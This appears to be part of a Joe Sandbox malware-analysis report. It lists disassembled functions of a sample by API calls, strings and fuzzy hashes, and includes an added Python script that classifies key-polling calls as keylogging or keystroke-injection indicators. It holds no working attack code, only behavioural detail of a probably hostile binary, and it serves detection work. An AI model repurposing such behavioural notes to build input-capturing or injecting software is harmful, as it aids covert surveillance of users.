              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharUpper
              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
              • API String ID: 3964851224-909552448
              • Opcode ID: 7d48513880851665cb4f23079ac2e862e02d6d159dd0edb17c0c0c503d1b3883
              • Instruction ID: 3d62e07922a18dd680d76d38dffefbf646fd327409b5a3c529c0c501e8663d6b
              • Opcode Fuzzy Hash: 7d48513880851665cb4f23079ac2e862e02d6d159dd0edb17c0c0c503d1b3883
              • Instruction Fuzzy Hash: 2D4182B512034E8BCF15EF90DD91AEA3725BF2A310F104414FD955B292D770AD3ACB50
              APIs
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
                • Part of subcall function 00187A84: _memmove.LIBCMT ref: 00187B0D
              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001E55D2
              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001E55E8
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E55F9
              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001E560B
              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001E561C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: SendString$_memmove
              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
              • API String ID: 2279737902-1007645807
              • Opcode ID: 9534c8635ffc6e44b29b5a823d4cc183f5c39033f2b9d8ff7fbbba9b5992ad04
              • Instruction ID: c5d88939966c704fb60660335b9cba588514002b44fc86c6459c405a02e91bfc
              • Opcode Fuzzy Hash: 9534c8635ffc6e44b29b5a823d4cc183f5c39033f2b9d8ff7fbbba9b5992ad04
              • Instruction Fuzzy Hash: 0311046056016979D720B662CC8ACFFBB7CEFA6F00F400469B405A30D1DF604E05CAB1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
              • String ID: 0.0.0.0
              • API String ID: 208665112-3771769585
              • Opcode ID: 48ebbfe2e9522ef884b71418b00fe2bad501ea0a9cf3baec103d09ded966f4ee
              • Instruction ID: 68f11e5a15ac939a6c5cb264161ce242a98dbe452b6710928ccecb752bfe6f8d
              • Opcode Fuzzy Hash: 48ebbfe2e9522ef884b71418b00fe2bad501ea0a9cf3baec103d09ded966f4ee
              • Instruction Fuzzy Hash: 56112435904214AFCB34EB25ED0AEDF77BCEF56714F0001B6F405A60A3EFB09A8186A1
              APIs
              • timeGetTime.WINMM ref: 001E521C
                • Part of subcall function 001A0719: timeGetTime.WINMM(?,75A8B400,00190FF9), ref: 001A071D
              • Sleep.KERNEL32(0000000A), ref: 001E5248
              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 001E526C
              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001E528E
              • SetActiveWindow.USER32 ref: 001E52AD
              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001E52BB
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 001E52DA
              • Sleep.KERNEL32(000000FA), ref: 001E52E5
              • IsWindow.USER32 ref: 001E52F1
              • EndDialog.USER32(00000000), ref: 001E5302
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
              • String ID: BUTTON
              • API String ID: 1194449130-3405671355
              • Opcode ID: d12a17601a1c50822d6c5b2900626aebf1ea893e4b0cfa10867154be98fb3ecf
              • Instruction ID: c6bdc794f98058ef2d87826fc0f2b3092f98a5dace90a72c390fffa60013edfb
              • Opcode Fuzzy Hash: d12a17601a1c50822d6c5b2900626aebf1ea893e4b0cfa10867154be98fb3ecf
              • Instruction Fuzzy Hash: 7021C374244B45AFE7125F71FE8CB2E3B6AFB5634AF400434F911865B2CBB19C508BA2
              APIs
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • CoInitialize.OLE32(00000000), ref: 001ED855
              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001ED8E8
              • SHGetDesktopFolder.SHELL32(?), ref: 001ED8FC
              • CoCreateInstance.OLE32(00212D7C,00000000,00000001,0023A89C,?), ref: 001ED948
              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001ED9B7
              • CoTaskMemFree.OLE32(?,?), ref: 001EDA0F
              • _memset.LIBCMT ref: 001EDA4C
              • SHBrowseForFolderW.SHELL32(?), ref: 001EDA88
              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001EDAAB
              • CoTaskMemFree.OLE32(00000000), ref: 001EDAB2
              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 001EDAE9
              • CoUninitialize.OLE32(00000001,00000000), ref: 001EDAEB
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
              • String ID:
              • API String ID: 1246142700-0
              • Opcode ID: 97b033dc201cc5d17ebe05dc1911a0dccbd36e913f88638c9530aae33b0e7ef1
              • Instruction ID: b0df68d2932add91c201430c40f0bcbf6f9212a1b487fb215dcae4f973ef435e
              • Opcode Fuzzy Hash: 97b033dc201cc5d17ebe05dc1911a0dccbd36e913f88638c9530aae33b0e7ef1
              • Instruction Fuzzy Hash: 37B10D75A00609AFDB14DFA5D888DAEBBF9FF48304B148469F905EB251DB30EE41CB50
              APIs
              • GetKeyboardState.USER32(?), ref: 001E05A7
              • SetKeyboardState.USER32(?), ref: 001E0612
              • GetAsyncKeyState.USER32(000000A0), ref: 001E0632
              • GetKeyState.USER32(000000A0), ref: 001E0649
              • GetAsyncKeyState.USER32(000000A1), ref: 001E0678
              • GetKeyState.USER32(000000A1), ref: 001E0689
              • GetAsyncKeyState.USER32(00000011), ref: 001E06B5
              • GetKeyState.USER32(00000011), ref: 001E06C3
              • GetAsyncKeyState.USER32(00000012), ref: 001E06EC
              • GetKeyState.USER32(00000012), ref: 001E06FA
              • GetAsyncKeyState.USER32(0000005B), ref: 001E0723
              • GetKeyState.USER32(0000005B), ref: 001E0731
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: State$Async$Keyboard
              • String ID:
              • API String ID: 541375521-0
              • Opcode ID: 6919fc615a4c4dd575d3507144245b6f22fd9cef6ee01640ae2b2f5bbd3b86f0
              • Instruction ID: c6e283d840ef667dd1bb9173e6b62fe708218e929fc63f89ddb73da338c1fd0e
              • Opcode Fuzzy Hash: 6919fc615a4c4dd575d3507144245b6f22fd9cef6ee01640ae2b2f5bbd3b86f0
              • Instruction Fuzzy Hash: B351B970A04BC829FB36DBB188557EEBFB49F19380F084599D5C2561C2DBA49BCCCB61
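The twelve calls above poll five virtual-key codes: 0xA0 and 0xA1 (left and right Shift), 0x11 (Ctrl), 0x12 (Alt) and 0x5B (left Win). All of them are modifiers, which is the state bookkeeping a keystroke-injection routine does before synthesising input; capture of typed text would show polling of the printable ranges. The Python below, an added example for this report and not Joe Sandbox tooling, parses API lines in this listing's `• Name.MODULE(args), ref: ADDR` format (including the `Part of subcall function` prefix) and makes that classification mechanical. `SAMPLE_LISTING` is copied from the block above; `CONSTRUCTED_LINE` is made up so the other branch runs; the `VK_*` names are the standard Windows constants.

```python
"""Parse the "APIs" entries of this listing and decode the virtual-key
codes polled through GetAsyncKeyState/GetKeyState.

Added example for this report, not Joe Sandbox tooling. SAMPLE_LISTING is
copied from the keyboard-state function above; CONSTRUCTED_LINE is made up.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Union

Arg = Union[int, str, None]

_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX = re.compile(r"-?[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                      # address of the call site
    subcall_of: Optional[int]     # containing function when listed as a subcall


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None               # value not resolved by the static pass
    if _HEX.fullmatch(tok):
        return int(tok, 16)       # "-00000005" -> -5
    return tok                    # literal string argument, e.g. "status PlayMe mode"


def parse_listing(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=[_parse_arg(t) for t in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


VK_NAMES = {
    0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL",
    0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT",
    0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
    0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}
MODIFIER_KEYS = {0x10, 0x11, 0x12, 0x5B, 0x5C, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5}


def _is_printable(code: int) -> bool:
    return 0x30 <= code <= 0x39 or 0x41 <= code <= 0x5A   # '0'-'9', 'A'-'Z'


def vk_name(code: int) -> str:
    if code in VK_NAMES:
        return VK_NAMES[code]
    return f"VK_{chr(code)}" if _is_printable(code) else f"VK_0x{code:02X}"


def polled_keys(calls: List[ApiCall]) -> Set[int]:
    """Key codes passed as first argument to the two polling APIs."""
    return {c.args[0] for c in calls
            if c.api in ("GetAsyncKeyState", "GetKeyState")
            and c.args and isinstance(c.args[0], int)}


def classify_key_polling(keys: Set[int]) -> str:
    """'printable-keys' is the keylogger indicator; 'modifiers-only' is the
    bookkeeping a keystroke-injection routine does before synthesising input."""
    if not keys:
        return "none"
    if any(_is_printable(k) for k in keys):
        return "printable-keys"
    return "modifiers-only" if keys <= MODIFIER_KEYS else "mixed"


SAMPLE_LISTING = """\
• GetKeyboardState.USER32(?), ref: 001E05A7
• SetKeyboardState.USER32(?), ref: 001E0612
• GetAsyncKeyState.USER32(000000A0), ref: 001E0632
• GetKeyState.USER32(000000A0), ref: 001E0649
• GetAsyncKeyState.USER32(000000A1), ref: 001E0678
• GetKeyState.USER32(000000A1), ref: 001E0689
• GetAsyncKeyState.USER32(00000011), ref: 001E06B5
• GetKeyState.USER32(00000011), ref: 001E06C3
• GetAsyncKeyState.USER32(00000012), ref: 001E06EC
• GetKeyState.USER32(00000012), ref: 001E06FA
• GetAsyncKeyState.USER32(0000005B), ref: 001E0723
• GetKeyState.USER32(0000005B), ref: 001E0731
"""
# Constructed line (not from the report): polling the 'A' key.
CONSTRUCTED_LINE = "• GetAsyncKeyState.USER32(00000041), ref: 00400000"

if __name__ == "__main__":
    keys = polled_keys(parse_listing(SAMPLE_LISTING))
    print(sorted(vk_name(k) for k in keys), classify_key_polling(keys))
```

Functions that poll 0x01/0x02 (the mouse buttons, as the drag-and-drop handler further down does) come out as `mixed`; only the `printable-keys` verdict is worth escalating as a keylogging indicator.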
              APIs
              • GetDlgItem.USER32(?,00000001), ref: 001DC746
              • GetWindowRect.USER32(00000000,?), ref: 001DC758
              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 001DC7B6
              • GetDlgItem.USER32(?,00000002), ref: 001DC7C1
              • GetWindowRect.USER32(00000000,?), ref: 001DC7D3
              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 001DC827
              • GetDlgItem.USER32(?,000003E9), ref: 001DC835
              • GetWindowRect.USER32(00000000,?), ref: 001DC846
              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 001DC889
              • GetDlgItem.USER32(?,000003EA), ref: 001DC897
              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001DC8B4
              • InvalidateRect.USER32(?,00000000,00000001), ref: 001DC8C1
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ItemMoveRect$Invalidate
              • String ID:
              • API String ID: 3096461208-0
              • Opcode ID: fb8af73268490a7aab4a9c6bd832b293043d8017f0d4b255bc2f8d22cdd1bce2
              • Instruction ID: 8095fa547899a9cbc04bb5409896e75b83328b413e4c57d5f244c6bcb2d5e236
              • Opcode Fuzzy Hash: fb8af73268490a7aab4a9c6bd832b293043d8017f0d4b255bc2f8d22cdd1bce2
              • Instruction Fuzzy Hash: 21513E71B40205ABDB18CFA9DD89AAEBBBAFB88310F14852DF515D76A1D7709D00CB50
              APIs
                • Part of subcall function 00181B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00182036,?,00000000,?,?,?,?,001816CB,00000000,?), ref: 00181B9A
              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001820D3
              • KillTimer.USER32(-00000001,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 0018216E
              • DestroyAcceleratorTable.USER32(00000000), ref: 001BBEF6
              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBF27
              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBF3E
              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001816CB,00000000,?,?,00181AE2,?,?), ref: 001BBF5A
              • DeleteObject.GDI32(00000000), ref: 001BBF6C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
              • String ID:
              • API String ID: 641708696-0
              • Opcode ID: 0a4b020794ef84cd83931eb387fe37cd9fde8739c60e65e7d061029f9017836b
              • Instruction ID: 52b19b0259955200c68dcc6c43b1dc55bdfca9ec9bb0364e25aa0c681e43202a
              • Opcode Fuzzy Hash: 0a4b020794ef84cd83931eb387fe37cd9fde8739c60e65e7d061029f9017836b
              • Instruction Fuzzy Hash: 1F61AD35104710DFDB3AAF14ED8CB69B7F1FB52316F10852CE0429A9A0C7B5A981DF52
              APIs
                • Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC
              • GetSysColor.USER32(0000000F), ref: 001821D3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ColorLongWindow
              • String ID:
              • API String ID: 259745315-0
              • Opcode ID: 7fca9bb065d4b2439a7ffbd6d646d0d95446f299d641d7a60ebd85b6b184176d
              • Instruction ID: 5098d0b9922f26f33851fd1d1ff4ba54e5cbe199f2501b9bed85b44463002988
              • Opcode Fuzzy Hash: 7fca9bb065d4b2439a7ffbd6d646d0d95446f299d641d7a60ebd85b6b184176d
              • Instruction Fuzzy Hash: CA418331140240EFDB266F28EC8CBB97B66EB46331F144265FD659A1E2C7318D42DB51
              APIs
              • CharLowerBuffW.USER32(?,?,0020F910), ref: 001EAB76
              • GetDriveTypeW.KERNEL32(00000061,0023A620,00000061), ref: 001EAC40
              • _wcscpy.LIBCMT ref: 001EAC6A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharDriveLowerType_wcscpy
              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
              • API String ID: 2820617543-1000479233
              • Opcode ID: 48974fe1455255ef6e3a54369547f81ea0b1c5293e9ceddf3c1c404996bb7f9a
              • Instruction ID: e35e740835879551bf3f0baed9972e9fb09bdcca6cc94361ec14cd1cb8975b76
              • Opcode Fuzzy Hash: 48974fe1455255ef6e3a54369547f81ea0b1c5293e9ceddf3c1c404996bb7f9a
              • Instruction Fuzzy Hash: 8F51FB711183419BC714EF15C8C2AAEB7A9FFA5300F94482DF496972A2DB31EE49CB53
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
                • Part of subcall function 00182344: GetCursorPos.USER32(?), ref: 00182357
                • Part of subcall function 00182344: ScreenToClient.USER32(002467B0,?), ref: 00182374
                • Part of subcall function 00182344: GetAsyncKeyState.USER32(00000001), ref: 00182399
                • Part of subcall function 00182344: GetAsyncKeyState.USER32(00000002), ref: 001823A7
              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0020C2E4
              • ImageList_EndDrag.COMCTL32 ref: 0020C2EA
              • ReleaseCapture.USER32 ref: 0020C2F0
              • SetWindowTextW.USER32(?,00000000), ref: 0020C39A
              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0020C3AD
              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0020C48F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
              • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$$pr$
              • API String ID: 1924731296-3322075626
              • Opcode ID: 3f2a6681ac5a0841439994fc922084a5477cc28df7d6c286cca930e60701ff99
              • Instruction ID: 6bcf3402f53b88fa36c7dcd69c6fed5d1a78eee82bbd28c02fd2b751825e3658
              • Opcode Fuzzy Hash: 3f2a6681ac5a0841439994fc922084a5477cc28df7d6c286cca930e60701ff99
              • Instruction Fuzzy Hash: 0A51BC74204301AFC714EF20D899F6A7BE5FB99710F10462DF9918B2E2CB70A958CF52
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __i64tow__itow__swprintf
              • String ID: %.15g$0x%p$False$True
              • API String ID: 421087845-2263619337
              • Opcode ID: ef6024e73a74a5f327af3913cfe3c55212aa02fe5f043cb8bf4a18e50db75e7b
              • Instruction ID: 00de93f73bbed1fe218f6a6058b9eb8995161e1372fde6e36e06adad0536bc52
              • Opcode Fuzzy Hash: ef6024e73a74a5f327af3913cfe3c55212aa02fe5f043cb8bf4a18e50db75e7b
              • Instruction Fuzzy Hash: 8841E575A04205AFDB28EF38DC42F7AB3E8EB45318F24446EF549D7291EB719A42CB11
              APIs
              • _memset.LIBCMT ref: 002073D9
              • CreateMenu.USER32 ref: 002073F4
              • SetMenu.USER32(?,00000000), ref: 00207403
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00207490
              • IsMenu.USER32(?), ref: 002074A6
              • CreatePopupMenu.USER32 ref: 002074B0
              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002074DD
              • DrawMenuBar.USER32 ref: 002074E5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
              • String ID: 0$F
              • API String ID: 176399719-3044882817
              • Opcode ID: d2740ad2990768824f0b67ba07c9f731c8e8a603cc2d44882589d4afdc3e1ada
              • Instruction ID: 3dc54189f644672454cf4bb616bbc710e24577d28ed7c94e3090b960c58137ab
              • Opcode Fuzzy Hash: d2740ad2990768824f0b67ba07c9f731c8e8a603cc2d44882589d4afdc3e1ada
              • Instruction Fuzzy Hash: 21413879A10306EFDB20DF64E988A9ABBB5FF49310F144029F955973A2D731A924CF50
              APIs
              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002077CD
              • CreateCompatibleDC.GDI32(00000000), ref: 002077D4
              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002077E7
              • SelectObject.GDI32(00000000,00000000), ref: 002077EF
              • GetPixel.GDI32(00000000,00000000,00000000), ref: 002077FA
              • DeleteDC.GDI32(00000000), ref: 00207803
              • GetWindowLongW.USER32(?,000000EC), ref: 0020780D
              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00207821
              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0020782D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
